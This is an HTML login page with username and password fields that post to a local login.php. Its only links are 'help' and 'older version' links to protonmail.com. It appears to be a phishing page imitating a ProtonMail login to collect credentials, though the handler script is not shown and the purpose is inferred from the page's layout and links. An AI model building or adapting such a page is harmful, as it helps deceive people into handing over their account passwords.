<!DOCTYPE html>

<html>

<body style="background-image: url(Images/bg_image.png); background-repeat: no-repeat; background-size: cover">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<!-- Author: Sajjad -->
<style>
img {
	width: 200px;
	}
	
h3 {
	color: white;
	text-align: center;
	}

input {
	border: 1px solid #d9d9d9;
	width: 20em;
	padding: 10px;
	background: transparent;
	border-radius: 5px;
	color: white;
	}
	
button {
	padding: 15px 120px;
	background-color: white;
	border: none;
	border-radius: 5px;
	}

p {
	font-family: Sans-serif;
	font-size: 12px;
	color: white;
	}

a {
	color: white;
	}
</style>
<center>
<form method="POST" action="login.php">
<br><br><br><br>
<img src="Images/banner.png"/>
<h3>USER LOGIN</h3>
<input type="text" name="login_username" placeholder="Username"></input><br><br>
<input type="password" name="login_password" placeholder="Password"></input><br><br>
<button type="submit"><b>LOGIN</b></button>
<p>Trouble logging in? Get <b><a href="https://www.protonmail.com">help</a></b> or try <b><a href="https://www.protonmail.com">older version</a></b>.</p>
</form>
</center>
</body>
</html>